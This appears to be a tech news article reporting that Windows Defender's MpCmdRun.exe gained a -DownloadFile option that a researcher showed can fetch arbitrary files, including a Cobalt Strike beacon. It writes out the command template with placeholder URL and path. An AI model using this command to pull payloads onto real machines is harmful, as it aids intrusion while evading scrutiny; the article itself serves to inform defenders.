Windows Defender in Windows 10 is the first line of defence in case of malware attacks and it does a pretty good job too.

  • Windows Defender in Windows 10 is a great tool for defending your system but a new update turned it into a threat.A new DownloadFile command can be used to download any external file, including malware on your computer.Explore our Software section for the best articles about most recent digital tools.If you’re interested in the latest Windows 10 articles, visit our comprehensive Windows 10 Hub.

However, in one of its new updates, the mighty antivirus got a new DownloadFile command, that will allow anyone to download any file from an URL to a certain path on your computer.

We can call this an exploit since it could also be used to even download malware, a thing that was discovered by security researcher Mohammad Askar who posted his finding on Twitter.

How can Windows Defender be used to download malware?

It’s really simple to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download any file from an external source to your computer.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

In his try, Askar was able to download Cobalt Strike beacon, a well-known attacker tool using this command line.

The new command is included in version 4.18.2007.8-0 and up which gives a pretty good start time for attackers.

Basically, this feature turns Windows Defender into a LOLBIN (living off the line binaries), a harmless system file that can be used for malicious purposes.

Fortunately, after you download the harmful file, it will be detected by the same Windows Defender or by another antivirus software if present.

From a reliable protection software, Windows Defender turned into another possible threat that will have to be closely monitored by admins and security experts.

If you have any suggestions or comments, please leave them below in the Comments section.

If the advices above haven’t solved your issue, your PC may experience deeper Windows problems. We recommend downloading this PC Repair tool (rated Great on TrustPilot.com) to easily address them. After installation, simply click the Start Scan button and then press on Repair All.

Still having issues? Fix them with this tool:

SPONSORED

Email *

Commenting as . Not you?

Comment